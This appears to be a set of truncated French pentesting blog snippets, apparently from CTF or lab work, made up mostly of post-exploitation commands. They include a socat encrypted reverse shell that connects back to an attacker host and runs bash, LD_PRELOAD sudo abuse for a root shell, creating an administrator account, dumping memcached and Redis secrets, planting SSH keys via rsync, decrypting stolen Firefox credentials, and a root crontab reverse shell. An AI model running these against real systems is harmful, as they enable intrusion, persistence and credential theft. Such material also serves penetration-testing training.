Vérification de l’accessibilité d’une machine
Sur la machine dont on veut déterminer l’accessibilité tcpdump -i tun0 icmp Sur le serveur compromis ping -n 3 ATTACKING_IP
Sur la machine dont on veut déterminer l’accessibilité tcpdump -i tun0 icmp Sur le serveur compromis ping -n 3 ATTACKING_IP
firewall-cmd –zone=public –add-port PORT/tcp #CentOS netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT #windows
On peut injecter du code lors de l’exécution d’une commande avec sudo en modifiant les variables d’environnement LD_PRELOAD ou LD_LIBRARY_PATH gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c On peut obtenir un root shell en exécutant un programme que l’on peut exécuter avec sudo de cette façon sudo LD_PRELOAD=/tmp/preload.so program-name-here preload.c #include <stdio.h> #include <sys/types.h> #include … Continuer la lecture
net user /add net localgroup administrators /add
export term=XTERM ctrl+Z stty raw -echo; fg reset stty -a #pour savoir le nombre de lignes et colonnes stty rows stty cols socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 TCP-L:53 FILE:`tty`,raw,echo=0 socat OPENSSL:53,verify=0 TCP:10.10.10.5:53 EXEC:”bash -li”,pty,stderr,sigint,setsid,sane #connect back to it
stats cachedump 1 0 On obtient les VALUE et en utilisant get avec le nom de la variable. Exemple: get user get passwd
redis-cli -h 10.9.0.60 -a “monmotdepasse” 10.9.0.60:6379> KEYS * 1) “tmp” 2) “marketlist” 3) “authlist” 4) “internal flag” 5) “int” 10.9.0.60:6379> 10.9.0.60:6379> KEYS “internal flag” 1) “internal flag” 10.10.190.83:6379> GET “internal flag” r0cker_is_the_best 10.9.0.60:6379> KEYS * 1) “internal flag” 2) “authlist” 3) “marketlist” 4) “int” 5) “tmp” 10.10.190.83:6379> GET authlist (error) WRONGTYPE Operation against a key … Continuer la lecture
rsync –list-only rsync://10.9.0.60 rsync –list-only rsync://rsync-connect@10.9.0.60/files #on entre le mot de passe rsync authorized_keys rsync://rsync-connect@10.9.0.60/files/sys-internal/.ssh
https://github.com/unode/firefox_decrypt python3 firefox_decrypt.py /home/germain/.mozilla/firefox Il existe aussi un module dans metasploit use multi/gather/firefox_creds set session 1 run python firefox_decrypt.py ./ #on renomme les fichiers correctement (voir la console de metasploit). on copie les fichiers dans le répertoire courant . ex. cert9.db, cookies.sqlite,key4.db,logins.json
En espionnant les processus avec pspy, on se rend compte qu’un crontab que l’on peut écrire est exécuté en tant qu’administrateur. Il est alors possible d’ajouter une ligne de commande dans un crontab exécuté par l’utilisateur root (administrateur) pour obtenir un shell sur la machine de l’attaquant. Sur kali, le shell est PHP est situé … Continuer la lecture